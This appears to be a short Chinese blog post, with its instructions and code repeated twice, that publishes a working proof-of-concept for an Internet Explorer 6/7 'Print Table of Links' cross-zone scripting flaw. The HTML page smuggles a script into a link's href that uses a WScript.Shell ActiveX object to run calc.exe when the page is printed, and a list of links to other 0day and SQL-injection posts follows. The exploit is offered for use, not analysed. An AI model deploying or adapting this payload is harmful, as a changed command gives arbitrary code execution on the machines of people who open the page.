IE 0day for IE6 and IE7
这个漏洞是由于微软IE浏览器启动“Print Table of Links”时引起的跨站攻击(Cross-Zone Scripting )
如果启用了 "Print Table of Links",在打印一个网页的时候,能够导致执行任意代码。
1.选择“Print Table of Links”选项
2.把保存以下代码为HTML格式,用IE打开,并打印,会执行calc.exe。
<html>
<body>
Print me with table of links to execute calc.exe
<a href="http://www.bla.com?x=b<script defer >var x=new ActiveXObject('WScript.Shell');x.Run('calc.exe');</script>a.c<u>o</u>m"></a>
<script>window.print();</script>
</body>
</html>
如果启用了 "Print Table of Links",在打印一个网页的时候,能够导致执行任意代码。
1.选择“Print Table of Links”选项
2.把保存以下代码为HTML格式,用IE打开,并打印,会执行calc.exe。
<html>
<body>
Print me with table of links to execute calc.exe
<a href="http://www.bla.com?x=b<script defer >var x=new ActiveXObject('WScript.Shell');x.Run('calc.exe');</script>a.c<u>o</u>m"></a>
<script>window.print();</script>
</body>
</html>
相关日志
跨站脚本执行漏洞代码的六点思路
Dvbbs8.2 access/sql 版login.asp远程sql注入漏洞
CreateLive CMS Version 4.0 0day
[漏洞]ewebeditor 0day
跨站脚本执行漏洞代码的六点思路
Dvbbs8.2 access/sql 版login.asp远程sql注入漏洞
CreateLive CMS Version 4.0 0day
[漏洞]ewebeditor 0day
